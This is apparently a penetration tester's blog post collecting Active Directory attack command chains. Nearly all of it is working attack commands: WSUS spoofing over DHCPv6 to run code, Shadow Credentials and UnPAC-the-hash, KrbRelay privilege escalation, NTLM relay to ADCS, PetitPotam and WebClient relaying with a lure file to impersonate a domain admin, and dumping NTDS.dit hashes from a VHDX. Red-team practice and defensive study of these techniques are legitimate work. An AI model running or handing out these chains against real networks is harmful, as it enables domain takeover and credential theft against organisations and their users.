active-directory-gists

# tl;dr This post is a collection of `Active Directory` abuse gists that I plan on updating with any techniques I had a chance to use on a real-life engagement. also available on GitHub: **[github link](https://github.com/zimnyaa)** --- ## ./ad/dhcpv6-wsus.sh (thanks cr7pt0pl4gu3!) ```shell # checking WSUS preferenses PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer ### after setting up the attack click "Check for updates" button ### set up DHCPv6 spoofing git clone https://github.com/RedTeamPentesting/pretender.git cd pretender sudo ./pretender -i eth0 --spoof wsus.lab.local ### setting up the IPv6 PyWSUS fork git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git cd pywsus-ipv6 sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"' ``` --- ## ./ad/shadowunpac.sh ```bash # getting the current ticket sliver (SESSION) > rubeus tgtdeleg /nowrap echo <ticket> | base64 --decode > ticket.kirbi ticketConverter.py ticket.kirbi ticket.ccache # adding ms-KeyCredentialLink proxychains4 python3 pywhisker/pywhisker.py -k -d "domain" --target "dcagent" -u "dadmin" --action "add" --filename cert # requesting a ticket with ShadowCredentials proxychains4 python3 gettgtpkinit.py -cert-pfx ../cert.pfx -pfx-pass pass -dc-ip dc1.domain domain/dcagent dcagent.ccache # UnPAC the ST export KRB5CCNAME=dcagent.ccache proxychains4 python3 getnthash.py -key <key> "domain/dcagent" ``` --- ## ./ad/adcs_lab.ps1 ```bash New-LabDefinition -Name Lab1CA1 -DefaultVirtualizationEngine Azure $azureDefaultLocation = 'Australia East' # CHANGETHIS Add-LabAzureSubscription -DefaultLocationName $azureDefaultLocation #defining default parameter values, as these ones are the same for all the machines $PSDefaultParameterValues = @{ 'Add-LabMachineDefinition:DomainName' = 'contoso.com' 'Add-LabMachineDefinition:Memory' = 8GB 'Add-LabMachineDefinition:OperatingSystem' = 'Windows Server 2016 Datacenter (Desktop Experience)' } Add-LabMachineDefinition -Name DC1 -Roles RootDC Add-LabMachineDefinition -Name CA1 -Roles CaRoot Add-LabMachineDefinition -Name Client1 -OperatingSystem 'Windows 10 Enterprise' Add-LabMachineDefinition -Name Client2 -OperatingSystem 'Windows 10 Enterprise' Install-Lab Enable-LabCertificateAutoenrollment -Computer -User -CodeSigning # AV is optional Invoke-LabCommand -ScriptBlock {Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))} -ComputerName Client2 -PassThru Invoke-LabCommand -ScriptBlock {Set-ExecutionPolicy Bypass -Scope Process -Force; choco install kis -y -force} -ComputerName Client2 -PassThru Show-LabDeploymentSummary -Detailed ``` --- ## ./ad/krbrelay_lpe.sh ```bash # creating RPC server, relaying SYSTEM Kerberos authentication to LDAP # we will use Shadow Credentials instead of RBCD to not rely on ms-ds-machineAccountQuota and be a little more stealthy # clsid from cube0x0 KrbRelay repo .\KrbRelay.exe -spn ldap/dc1.contoso.com -shadowcred -clsid 0bae55fc-479f-45c2-972e-e951be72c0c1 # KrbRelay outputs a Rubeus command for you, but you do not need to unPAC Rubeus.exe asktgt /user:Client1$ /certificate:<cert> /password:"<pass>" /nowrap # PTH to SMB is a spook, better request a ticket .\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Install /self /altservice:cifs/client1.contoso.com /nowrap # decoding .kirbi for use on *nix echo <ticket> | base64 --decode > install.kirbi python3 ticketConverter.py install.kirbi install.ccache export KRB5CCNAME=install.ccache # adjusting the date and timezone to domain ones (alternatively, use faketime, but that didn't work for me for some reason) ntpdate dc1.contoso.com timedatectl set-timezone Europe/Chisinau # evil-winrm is better here, for demonstration purposes only python3 ./smbexec.py -k contoso.com/[email protected] -debug -no-pass ``` --- ## ./ad/unpac_adcs.sh ```bash # setting up the relay. I avoid LLMNR/NBNS/DHCPv6/etc, as they're too noisy, and prefer either UNC path injection # (somewhere custom), or NTLM hash farming python3 ./ntlmrelayx.py -t http://ca1.contoso.com/certsrv/certfnsh.asp --adcs -smb2support # ntlmrelayx ADCS outputs an unencrypted .pfx cat lowpriv.b64 | base64 --decode > lowpriv.pfx # dirkjanm PKINITTools, had to patch impacket previously to output AES session keys python3 gettgtpkinit.py contoso.com/lowpriv -cert-pfx lowpriv.pfx lowpriv.ccache -v export KRB5CCNAME=lowpriv.ccache # decrypting the PAC blob python3 getnthash.py contoso.com/lowpriv -key <key> ``` --- ## ./ad/webclient_rbcd.sh ```bash # setting up a DNS record in the domain, the zone I required was found in ForestDNSZones python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local # setting up a LDAPS relay to grant RBCD to computer account we have # in my case MAQ = 0, so I escalated on a domain workstation and used it sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da # PetitPotam to WebDAV with domain credentials (not patched) # DO NOT use FQDN here python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER # if WebClient is not enabled, you will get the error 0x7. You can try to enable it by viewing a .searchConnector-ms file from the server (if it's a terminal server, for example) or hosting it on a public share and waiting # Documents.searchConnector-ms example: # <?xml version="1.0" encoding="UTF-8"?> # <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector"> # <iconReference>imageres.dll,-1002</iconReference> # <description>Microsoft Outlook</description> # <isSearchOnlyItem>false</isSearchOnlyItem> # <includeInStartMenuScope>true</includeInStartMenuScope> # <iconReference>\\YOUR_IP@8080\whatever.ico</iconReference> # <templateInfo> # <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> # </templateInfo> # <simpleLocation> # <url>\\YOUR_IP@8080\whatever.ico</url> # </simpleLocation> # </searchConnectorDescription> # ccache obtained with Rubeus /tgtdeleg and converted with ticketConverter export KRB5CCNAME=ws.ccache impacket-getST -k -spn wsman/TARGETSERVER.DOMAIN.local -dc-ip DC_IP -impersonate domain_admin DOMAIN.local/MYWS\$ # after setting up a KDC krb5.conf as per evil-winrm install instructions export KRB5CCNAME=domain_admin.ccache evil-winrm -r DOMAIN.local -i TARGETSERVER.DOMAIN.local --spn wsman ``` --- ## ./ad/vhdx_on_a_share.sh ```bash # runs on kali out-of-the-box # this is not a ready-made script, more like a collection of commands # QEMU mounting a drive modprobe nbd max_part=16 qemu-nbd -c /dev/nbd0 filename.vhdx # look for the second partition, usually where the FS resides fdisk -l /dev/nbd0 # mount the second partition mount /dev/nbd0p2 /mnt/windows # copy SYSTEM (for the bootkey) and NTDS.dit cp /mnt/windows/Windows/System32/config/SYSTEM ~/SYSTEM cp /mnt/windows/Windows/System32/NTDS/ntds.dit ~/ntds.dit cd # do not bother with esedbexport, impacket can do everything for us impacket-secretsdump -ntds ~/ntds.dit -system ~/SYSTEM -hashes lmhash:nthash LOCAL -outfile hashes.txt ```